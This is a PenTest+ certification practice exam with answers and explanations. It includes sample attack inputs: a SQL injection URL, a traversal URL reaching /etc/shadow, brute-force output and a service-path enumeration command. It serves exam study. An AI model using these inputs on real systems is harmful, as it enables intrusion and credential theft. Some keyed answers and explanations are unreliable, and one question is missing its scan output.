CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason DIon6 of 6)

Question 1

You have been contracted to conduct a penetration test against Dion Training’s learning management system (LMS). The company wants to determine how effectively their LMS can scale up during periods of high student demand without negatively affecting the student experience. Which of the following things in your engagement documentation would be the MOST important to ensuring successful load testing?

A.If a black box or white box test will be utilized

B.The time of day used for conducting the test

C.The IP addresses of the servers

D.If a certificate pinning exception will be used

Answer 1

B.The time of day used for conducting the test

Explanation: OBJ-1.3: The time of day used for conducting the test is critically important based on this engagement’s goals. This engagement seeks to determine if their LMS can quickly scale up in response to increase student demand. This is not just a bandwidth test or simple load test, but they also want to determine if the customer/student experience is affected. To determine that, the engagement must occur while many real students are also online and taking the courses.

Question 2

Which of the following rules of engagement provides a clear enumeration of the tasks to be performed as part of the penetration test?

A.Timeline

B.Location of team

C.Temporal restrictions

D.Test boundaries

Answer 2

A.Timeline

Explanation: OBJ-1.1: The timeline of an engagement provides a clear enumeration of the tasks to be performed as part of the penetration test. This is documented in the rules of engagement. This timeline may also include who will perform each task. The timeline does not have to be written to detail the exact day or time of the task but should, at a minimum, provide a logical sequence or order to the engagement.

Question 3

What is a legal contract outlining the confidential material or information that will be shared by the pentester and the organization during an assessment?

A.SOW

B.MSA

C.NDA

D.Corporate policy

Answer 3

C.NDA

Explanation: OBJ-1.2: This is the definition of a non-disclosure agreement (NDA). There may be two NDAs in use: One from the organization to the pentester and another from the pentester to the organization. The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the assessment’s size and scope and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scopes for each one. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

Question 4

You are preparing for an upcoming penetration test. You want to begin your reconnaissance but need to validate the scope of the IP addresses and the times of day you can scan the network. Which of the following documents should you refer to find these details?

A.RFP

B.MSA

C.ROE

D.NDA

Answer 4

C.ROE

Explanation: OBJ-1.2: The rules of engagement (ROE) contain the timeline, location, temporal restrictions, transparency of testing, and test boundaries for the penetration test. Therefore, if you look at the temporal restrictions portion of the ROE, you will see what times of day you can perform your scans and exploits. If you reference the test boundaries section, it should contain what types of scanning and exploits are allowed to be used and which systems are and are not in the scope of the assessment.

Question 5

A military defense contracting company has hired your company to conduct a penetration test against their networks. Their company has a strong vulnerability management program in place, but they are concerned that they may still be subject to remote hackers’ intrusion. They have asked your company to create a red team with their most skilled hackers and conduct a long-term engagement over 6-12 months. The goal of this assessment is to emulate an attacking group that uses stealth while infiltrating the network, quietly maintaining persistence, and slowly exfiltrating data out of the network over time to determine if their cybersecurity analysts could detect this type of threat. Which of the following type of threat actors will your red team need to emulate?

A.Hacktivists

B.APT

C.Script kiddies

D.Insider threat

Answer 5

B.APT

Explanation: OBJ-1.3: An advanced persistent threat (APT) is a type of attacker that keeps a low profile while infiltrating a remote network. Once inside the network, they maintain their patience while gathering intelligence and slowly exfiltrating data out of the network. Many APTs work for a nation-state and focus on intelligence operations. Some APTs also perform corporate espionage to steal highly guarded trade secrets from competitors. APTs commonly use several attack vectors to ensure their success in gaining unauthorized access to information.

Question 6

You are planning an engagement with a new client. Which target type should be selected to simulate a hacktivist or script kiddie?

A.Internal

B.On-site

C.Off-site

D.Third-party hosted

Answer 6

C.Off-site

Explanation: OBJ-1.3: A hacktivist, script kiddie, or APT is usually defined as an off-site or external target type. A hacktivist is a hacker who gains unauthorized access and disrupts a computer system to achieve political or social change. A script kiddie is an inexperienced hacker with limited technical knowledge who relies on automated tools to hack. An APT is an advanced hacker who can avoid detection for a long period of time. An APT is usually a nation state-funded hacker used for intelligence gathering operations.

Question 7

What is not a step in the NIST SP 800-115 Methodology?

A.Planning

B.Discovery

C.Reporting

D.Scoping

Answer 7

D.Scoping

Explanation OBJ-1.3: Scoping is not one of the four steps in the NIST SP 800-115 (Technical Guide to Information Security Testing and Assessment) methodology. The four steps are Planning, Discovery, Attack, and Reporting.

Question 8

Which type of agreement between companies and employees is used as a legal basis for protecting information assets?

A.MOU

B.NDA

C.ISA

D.SLA

Answer 8

B.NDA

Explanation: OBJ-1.2: A non-disclosure agreement (NDA) is the legal basis for protecting information assets. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express intent for two companies to work together. A service level agreement (SLA) is a contractual agreement setting out the detailed terms under which a service is provided. The interconnection security agreement (ISA) governs the relationship between any federal agency and a third party interconnecting their systems.

Question 9

Which of the following rules of engagement provides the days and times that the penetration test can occur?

A.Timeline

B.Location of team

C.Temporal restrictions

D.Test boundaries

Answer 9

C.Temporal restrictions

Explanation OBJ-1.1: Temporal restrictions provide the constraints for which days and times the penetration test can be performed. For example, some rules of engagement will prevent the engagement from occurring outside of normal working hours. Conversely, others only allow the engagement to occur during working hours. This is something that should be clearly documented in the scope of work and the scoping documents.

Question 10

Which of the following is NOT one of the main criteria included in a penetration testing plan?

A.Timing

B.Scope

C.Account credentials

D.Authorization

Answer 10

C.Account credentials

Explanation: OBJ-1.1: The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization. Account credentials are usually provided during a white box test or vulnerability assessment, usually not provided for a penetration test.

Question 11

What is a legal contract that outlines the guidelines for any business documents and contracts between two parties?

A.SOW

B.MSA

C.NDA

D.AUP

Answer 11

B.MSA

Explanation: OBJ-1.2: A master service agreement (MSA) is an agreement that establishes precedence and guidelines for any business documents that are executed between two parties. If a company is hiring a penetration testing firm to conduct multiple engagements, they may use a master service agreement to cover each assessment’s commonalities and scope. Then, there would be a scope of work (SOW) for each assessment completed under the MSA.

Question 12

What type of assessment seeks to validate a systems security posture against a particular checklist?

A.Compliance-based

B.Objective-based

C.Goal-based

D.Red Team

Answer 12

A.Compliance-based

Explanation: OBJ-1.3: Compliance-based assessments seek to validate a system against a given checklist. This could validate organizational policies, be risk-based, or be used to validate PCI-DSS compliance. Objective-based penetration testing approaches an objective from all angles to ensure that information remains secure. This testing more accurately simulates the attacks launched by a malicious party. Goal-based assessments use goals defined before the assessment begins, and the penetration tester works to achieve the goals. Once a goal is achieved, the penetration testers should determine how many unique ways the goal can be achieved. A red team is a group that helps organizations to improve themselves by providing opposition to the point of view of the organization that they are helping.

Question 13

A cybersecurity analyst is working at a college that wants to increase its network’s security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?

A.Passive scanning engine located at the core of the network infrastructure

B.Combination of cloud-based and server-based scanning engines

C.Combination of server-based and agent-based scanning engines

D.Active scanning engine installed on the enterprise console

Answer 13

D.Active scanning engine installed on the enterprise console

Explanation OBJ-2.2: Since the college wants to ensure a centrally-managed enterprise console, an active scanning engine installed on the enterprise console would best meet these requirements. The college’s cybersecurity analysts could then perform scans on any devices connected to the network using the active scanning engine at the desired intervals. Agent-based scanning would be ineffective since the college cannot force the agents’ installation onto each of the personally owned devices brought in by the students or faculty. A cloud-based or server-based engine may be useful, but it won’t address the centrally-managed requirement. Passive scanning is less intrusive but is subject to a high number of false positives.

Question 14

You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customer’s credit cards during processing. Which of the following types of threats would you classify this malware as?

A.Rootkit

B.Keylogger

C.Rnasomware

D.PoS Malware

Answer 14

D.PoS Malware

Explanation OBJ-2.5: Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card’s track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.

Question 15

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over the results of their nmap scan results: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Starting NMAP 7.60 at 2020-06-12 21:23:15 NMAP scan report for 192.168.1.45 Host is up (0.78s latency). Not shown: 992 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:0C:29:18:6B:DB -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which of the following operating systems is most likely used by the host?

A.Windows server

B.Linux server

C.Windows workstation

D.Networked printer

Answer 15

D.Networked printer

Explanation OBJ-2.3: Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP for most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, 445 are found, this is usually a good indication of a Windows file server. Port such as FTP, telnet, SMTP, and http is used by both Windows and Linux servers; therefore, they are not as helpful to indicate which operating system is in use by the host.

Question 16

Which of the following exploitation frameworks contain plugins that can trigger buffer overflows in SCADA systems, such as /exploit/windows/scada/daq_factory_bof that can trigger a stack overflow by sending excessive requests to a service port on the system?

A.Nessus

B.Androzer

C.Metasploit

D.Nikto

Answer 16

C.Metasploit Explanation

OBJ-2.5: Metasploit is an open-source exploitation framework that uses plugins to add different exploits and functionalities. They are always in the form of a directory structure, like /exploit/windows/scada/daq_factory_bof. This represents the plugin type (exploit), the operating system involved (windows), the service/program (scada), and the specific exploit (daq_factory_bof). If you see this format in a question, the answer is most likely Metasploit related.

Question 17

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10 [ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10 [ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10 [ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10 [ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10 [ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10 [ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10 [ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10 [ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10 [ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What type of test is the penetration tester currently conducting?

A.Conducting a port scan of 192.168.1.142

B.Conducting a brute force login attempt of a remote service on 192.168.1.142

C.Conduct a ping sweep of 192.168.1.142/24

D.Conducting a Denial of Service attack on 192.168.1.142

Answer 17

B.Conducting a brute force login attempt of a remote service on 192.168.1.142

Explanation OBJ-2.4: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

Question 18

You are attending a cybersecurity conference and just watched a security researcher demonstrating the exploitation of a web interface on a SCADA/ICS component. This caused the device to malfunction and be destroyed. You recognize that the same component is used throughout your company’s manufacturing plants. Which of the following mitigation strategies would provide you with the most immediate protection against this emergent threat?

A.Demand that the manufacturer of the component release a patch immediately and deploy the patch as soon as possible

B.Logically or physically isolate the SCADA/ICS component from the enterprise network

C.Evaluate if the web interface must remain open for the system to function; if it is not needed, block the web interface

D.Replace the affected SCADA/ICS components with more secure models from a different manufacturer

Answer 18

C.Evaluate if the web interface must remain open for the system to function; if it is not needed, block the web interface

Explanation: OBJ-2.5: The most immediate protection against this emergent threat would be to block the web interface from being accessible over the network. Before doing this, you must evaluate whether the interface needs to remain open for the system to function properly. If it is not needed, you should block it to minimize the SCADA/ICS component’s attack surface. Ideally, your SCADA/ICS components should already be logically or physically isolated from the enterprise network. Since the question doesn’t mention the networks as an area of concern, we can assume they are already following the industry best practice of logical or physical segmentation between the SCADA/ICS network and the enterprise network. On the exam, make sure you focus on the question being asked. In this case, the question focuses on the web interface. Developing a patch can be a time-consuming process, therefore waiting for the manufacturer to provide a patch will not provide immediate protection to your components. The same is true for replacing the affected components. Even if you could get the company to authorize the funding for such a purchase, it would take time to order, ship, receive, and install the new components. Additionally, you would cause unwanted downtime in the factory during the installation of the components, making it an ineffective option when simply blocking the web interface is free, quick, and effective.

Question 19

An analyst just completed a port scan and received the following results of open ports: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- TCP: 80 TCP: 110 TCP: 443 TCP: 1433 TCP: 3306 TCP: 3389 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Based on these scan results, which of the following services are NOT currently operating?

A.Web

B.Database

C.SSH

D.RDP

Answer 19

C.SSH

Explanation: OBJ-2.1: Based on the port numbers shown as open in the nmap scan results, SSH is not currently operating. SSH operates over port 22. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389.

Question 20

You are analyzing the vulnerability scanning results from a recent web vulnerability scan in preparation for the exploitation phase of an upcoming assessment.

A portion of the scan results is shown below. Which exploit is the website vulnerable to based on the results?

A.Cookie manipulation

B.Local file inclusion

C.SQL Injection

D.Session hijacking

Answer 20

B.Local file inclusion

Explanation: OBJ-2.3: Based on the results, you can determine that this website is vulnerable to a file inclusion exploit. If you were able to decode the Base64 data in the vulnerability (which you are not expected to on the exam in real-time), you would see it references a local file like c:\wwwroot\image.jpg or similar. You could also use the process of elimination on this question by seeing no SQL or cookies displayed in the results.

Question 21

You have been given access to a Windows system located on an Active Directory domain as part of a white box penetration test. Which of the following commands would provide information about other systems on this network?

A.net use

B.net user

C.net group

D.net config

Answer 21

A.net use

Explanation: OBJ-2.1: The net use command will list network shares that the workstation is using. This will help to identify file servers and print servers on the network. The net group command can only be used on domain controllers. The net config command will allow servers and workstations services to be controlled once they have already been identified. The net user command would show any user accounts on the local Windows workstation you are using.

Question 22

Syed is developing a vulnerability scanner program for a large network of sensors to monitor his company’s transcontinental oil pipeline. What type of network is this?

A.SoC

B.CAN

C.BAS

D.SCADA

Answer 22

D.SCADA

Explanation: OBJ-2.5: SCADA (supervisory control and data acquisition) networks work off an ICS (industry control system) and maintain sensors and control systems over large geographic areas. A building automation system (BAS) for offices and data centers (“smart buildings”) can include physical access control systems, but also heating, ventilation, and air conditioning (HVAC), fire control, power and lighting, and elevators and escalators. Vehicular networks are called a controller area network (CAN). A CAN uses serial communication buses to connect electronic control units and other subsystems in cars and unmanned aerial vehicles (UAV). System-on-chip (SoC) is a design where all these processors, controllers, and devices are provided on a single processor die or chip.

Question 23

`A software developer has just finished writing a new application. You have been contracted to conduct a scan to determine what vulnerabilities may exist. The developer provides you with the source code and the binary for the application. Which of the following should you perform FIRST?

A.Vulnerability scan

B.Dynamic application scan

C.Static application scan

D.Compliance scan

Answer 23

C.Static application scan

Explanation OBJ-2.2: A static application scan, or static code analysis, is the process of reviewing the source code while it is not executing. This requires the source code of the application, which in this scenario was provided. Static analysis can help you discover how the application functions and will allow you to find mistakes caused by poor programming practices, such as the failure to conduct input validation. If you have the source code and understand how to read the language used in it, you should first conduct a static code analysis. Once completed, you can move on to a dynamic application scan.

Question 24

In a CVSS metric, which of the following is NOT one of the factors that comprise the base score for a given vulnerability?

A.Access vector

B.Authentication

C.Access complexity

D.Availability

Answer 24

B.Authentication

Explanation OBJ-2.3: In CVSS 3.1, the base metric is comprised of 8 factors: access vector (AV), access complexity (AC), privileges required (PR), user interaction (UI), scope (S), confidentiality (C), integrity (I), and availability (A).

Question 25

You have just conducted an automated vulnerability scan against a static webpage without any user input fields. You have been asked to adjudicate the scanner’s findings in the automated report. Which of the following is MOST likely to be a false positive?

A.Missing secure flag for sites cookies

B.Version disclosure of server information

C.Supports weak cipher suites

D.Unencrypted transfer of data

Answer 25

B.Version disclosure of server information

Explanation OBJ-2.3: The disclosure of internal server information, such as its version, is a common vulnerability on both static webpages and dynamic webpages. This disclosure can occur during banner grabber or by reviewing the source course of the webpage.

Question 26

You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization’s operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system?

A.Ask the CEO for a list of the critical systems

B.Conduct a nmap scan of the network to determine the OS of each system

C.Scope the scan based on IP subnets

D.Review the asset inventory and BCP

Answer 26

D.Review the asset inventory and BCP

Explanation OBJ-2.1: To best understand a system’s criticality, you should review the asset inventory and the BCP. Most organizations classify each asset in its inventory based on its criticality to the organization’s operations. This helps to determine how many spare parts to have, the warranty requirements, service agreements, and other key factors to help keep these assets online and running at all times. Additionally, you can review the business continuity plan (BCP) since this will provide the organization’s plan for continuing business operations in the event of a disaster or other outage. Generally, the systems or operations listed in a BCP are the most critical ones to support business operations. While the CEO may be able to provide a list of the most critical systems in a large organization, it isn’t easy to get them to take the time to do it, even if they did know the answer. Worse, in most large organizations, the CEO isn’t going to know what systems he relies on, but instead just the business functions they serve, again making this a bad choice. While conducting a nmap scan may help you determine what OS is being run on each system, this information doesn’t help you determine criticality to operations. The same is true of using IP subnets since a list of subnets by itself doesn’t provide criticality or prioritization of the assets.

Question 27

Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization’s data center?

A.Schedule scans to be conducted evenly throughout the day

B.Schedule scans to run during periods of low activity

C.Schedule scans to begin at the same time everyday

D.Schedule scans to run during peak times to simulate performance under load

Answer 27

B.Schedule scans to run during periods of low activity

Explanation

OBJ-2.2: For the best results, the scans should be scheduled during periods of low activity. This will help to reduce the negative impact of scanning on business operations. The other three options all carry a higher risk of causing disruptions to the network or its business operations.

Question 28

The management at Steven’s work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network?

A.A discovery scan using a port scanner

B.Router and switch-based MAC address reporting

C.A physical survey

D.Reviewing a central administration tool like a SCCM

Answer 28

B.Router and switch-based MAC address reporting

Explanation OBJ-2.1: The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.

Question 29

An analyst reviews the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors can access the internet. How can this type of attack be prevented from occurring in the future?

A.Implement a VLAN separate the HVAC control system from the open wireless network

B.Install an IDS to protect the HVAC system

C.Enable NAC on the open wireless network

D.Enable WPA2 security on the open wireless network

Answer 29

A.Implement a VLAN separate the HVAC control system from the open wireless network

Explanation OBJ-2.5: A VLAN is useful to segment out network traffic to various parts of the network and stop someone from the open wireless network from logging to the HVAC controls. By utilizing NAC, each machine connected to the open wireless network could be checked for compliance and determine if it is a ‘known’ machine, but they would still be given access to the entire network. Also, since this is a publicly usable network, using NAC could prevent users from accessing all the network features. An IDS would be a good solution to detect the attempted logins, but it won’t prevent them. Instead, an IPS would be required to prevent logins.

Question 30

A vulnerability scanner has reported that a vulnerability exists in the system. Upon validating the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation?

A.False positive

B.False negative

C.True positive

D.True negative

Answer 30

A.False positive

Explanation OBJ-2.3: A false positive occurs when a scanner detects a vulnerability, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a scanner detects a vulnerability, and the vulnerability exists on the scanned system. A true negative occurs when a scanner does not detect a vulnerability because the vulnerability does not exist on the scanned system. A false negative occurs when a scanner does not detect a vulnerability, but the vulnerability actually exists on the scanned system.

Question 31

You are conducting a penetration test against an organization. You have captured the legitimate authentication handshake between a client and a server. Later in the day, you retransmit that session while spoofing your MAC address to that of the client. Which of the following exploits are you using?

A.Relay attack

B.Fragmentation attack

C.Replay attack

D.Downgrade attack

Answer 31

C.Replay attack

Explanation OBJ-3.3: A replay attack repeats a legitimate transmission in a malicious context. For example, a user might send their authentication information to a client or system; the attacker who eavesdrops on this communication can use the authentication in a later transmission, essentially impersonating the victim. In wireless networking, replaying transmissions can be used to enable several different attacks. Do not confuse a replay attack with a relay attack. In a replay attack, a legitimate network packet or frame is retransmitted repeatedly. In a relay attack, an attacker inserts themselves man-in-the-middle style between two devices, intercepting and forwarding traffic between them.

Question 32

While conducting a penetration test of a web application, you enter the following URL,

http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10.

What type of exploit are you attempting?|

A.Session hijacking

B.SQL Injection

C.Buffer overflow

D.XML Injection

Answer 32

B.SQL Injection

Explanation OBJ-3.4: This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic.

Question 33

You are scheduled to conduct a physical penetration test against an organization. You need to access the building when many other employees are arriving at work in the morning. Which of the following methods would be the MOST effective to utilize?

A.Fence jumping

B.Badge cloning

C.Lock picking

D.Tailgating

Answer 33

D.Tailgating

Explanation OBJ-3.6: Tailgating is an attack where the attacker slips in through a secure area by following an authorized employee. The employee doesn’t know that anyone is behind them. When trying to enter a building during the morning rush, it is common that other friendly employees will either hold the door open for you (piggybacking) or will open the door for themselves but not push it closed behind them as they walk through it. This would be the perfect time to tailgating into the building.

Question 34

In which type of attack does the attacker begin with a normal user account and then seek additional access rights?

A.Privilege escalation

B.Spear phishing

C.Cross-site scripting

D.Remote code execution

Answer 34

A.Privilege escalation

Explanation OBJ-3.5: Privilege escalation attacks seek to increase the access level that an attacker has to a target system. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization, or business. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Remote code execution is the ability an attacker has to access someone else’s computing device and make changes, no matter where the device is geographically located.

Question 35

You are conducting a social engineering attack against an organization as part of an engagement. You run over to a busy employee and quickly push a USB drive in their face. “Quick, quick, I am running late for my presentation. Please, print out the PDF on this drive for me!” The employee looks unwilling to help, but you continue to explain how you are running out of time and need their assistance. What type of social engineering principle is being exploited here?

A.Authority

B.Scarcity

C.Urgency

D.Trust

Answer 35

C.Urgency

Explanation:

OBJ-3.1: Urgency is focused on the element of time. An attacker encourages the victim to act quickly, which often leads to them making security mistakes. Urgency is related to scarcity, and the two are often effectively used together.

Question 36

In what type of attack does the potential intruder trick a user into providing sensitive information?

A.Social engineering

B.Bluesnarfing

C.Man-in-the-middle

D.Evil twin

Answer 36

A.Social engineering

Explanation OBJ-3.1: Social engineering is the art of convincing people to reveal confidential information to the intruder

Question 37

What is a common technique used by malicious individuals to perform a man-in-the-middle attack on a wireless network?

A.ARP cache posioning

B.Amplified DNS attacks

C.Session hijacking

D.Creating an evil twin

Answer 37

D.Creating an evil twin

Explanation OBJ-3.3: Evil Twin access points are the most common way to perform a man-in-the-middle attack on a wireless network. An evil twin is a copy of a legitimate access point, not necessarily giving it access to a specific network or even the internet.

Question 38

Your smartphone begins to receive unsolicited messages while eating lunch at the restaurant across the street from your office. What might cause this to occur?

A.Packet sniffing

B.Bluesnarfing

C.Bluejacking

D.Geotagging

Answer 38

C.Bluejacking

Explanation OBJ-3.3: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as smartphones and tablets. On the other hand, Bluesnarfing involves taking data from a smartphone or tablet over Bluetooth without permission. Bluetooth has a limited range, so the attacker is likely within 10 meters of the victimized device. Geotagging involves embedded the geolocation coordinates into a piece of data (normally a photo or video). Packet sniffing is a passive method of collecting network traffic for follow-on analysis at a later time.

Question 39

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of exploit are you attempting?

A.SQL Injection

B.Buffer overflow

C.Directory traversal

D.XML Injection

Answer 39

C.Directory traversal Explanation OBJ-3.4: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input.

Question 40

Several users have contacted the help desk to report that they received an email from a well-known bank stating that their accounts have been compromised and they need to “click here” to reset their banking password. Some of these users are not even customers of this particular bank, though. Which of the following best describes this type of attack?

A.Phishing

B.Spear phishing

C.Whaling

D.Brute force

Answer 40

A.Phishing

Explanation: OBJ-3.1: This is an example of a phishing attack. Phishing is the fraudulent practice of sending emails and pretending to be from a reputable company to trick users into revealing personal information, such as passwords and credit card numbers. This email appears to be untargeted since it was sent to both customers and non-customers of this particular bank; it is best classified as phishing. Spear phishing requires the attack to be more targeted and less widespread.

Question 41

Jason is conducting a penetration test against an organization’s Windows network. He then enters a command into the shell and receives the following output:

-=-=-=-=-=- C:\Users\jason\Desktop> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v “C:\Windows\” | findstr /i /v “”” VulnerableService Some Vulnerable Service C:\Program Files\A Subfolder\B Subfolder\SomeExecutable.exe -=-=-=-=-=-

Based on the output above, which of the following types of vulnerabilities does this Windows system contain?

A.Writeable service

B.Clear text credentials in LDAP

C.Unquoted service path

D.Unsecure file/folder permissions

Answer 41

C.Unquoted service path

Explanation OBJ-3.5: This Windows machine contains an unquoted service path vulnerability, as shown in the output. If a service is created with an executable path that contains spaces and is not enclosed within quotes, then an unquoted service path vulnerability exists. In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument. If the service involved has SYSTEM privileges, an attacker could exploit this vulnerability and gain SYSTEM level access. This command finds the service name, executable path, the display name of the service, and auto starts in all the directories except C:\Windows\ (since by default there is no such service that has spaces and is unquoted in this folder). As shown in the output, the service called “VulnerableService” has an unquoted service path.

Question 42

You are planning to exploit a network-based vulnerability against an organization as part of a penetration test. You attempted to connect your laptop to the network jack in their conference room. You found yourself in the highly restricted VLAN that the organization allows its visitors to connect to when conducting presentations. This VLAN only allows you to access the internet, not the internal network. You decide you need to conduct VLAN hopping. Which of the following methods would be MOST likely to succeed?

A.Spoof the MAC address of the rooms VOIP phone to your laptop

B.Poison or overflow the MAC table of the switch

C.Connect a wireless access point of the conference rooms network jack

D.Harvest the user credentials of an employee and use those to connect

Answer 42

B.Poison or overflow the MAC table of the switch

Explanation OBJ-3.2: VLAN hopping is the act of illegally moving from one VLAN to another. A VLAN (virtual LAN) is a logical grouping of switch ports extending across any number of switches on an Ethernet network. One of the most common VLAN hopping methods is to overflow the MAC table on a vulnerable switch. When this occurs, the switch defaults to operating as a hub and repeats all frames being received through all of its ports. This “fail open” method ensures the network can continue to operate, but it is a security risk that can be exploited by the penetration tester.

Question 43

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- https://test.diontraining.com/profile.php?userid=1546 https://test.diontraining.com/profile.php?userid=5482 https://test.diontraining.com/profile.php?userid=3618 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What type of vulnerability does this website have?

A.Race conditions

B.Insecure direct object reference

C.Improper error handling

D.Weak or default configurations

Answer 43

B.Insecure direct object reference

Explanation OBJ-3.4: Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. An attacker could change the userid number and directly access any user’s profile page in this scenario. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer. Weak or default configurations are commonly a result of incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information. Improper handling of errors can reveal implementation details that should never be revealed, such as detailed information that can provide hackers important clues on the system’s potential flaws.

Question 44

Evaluate the following log entry:

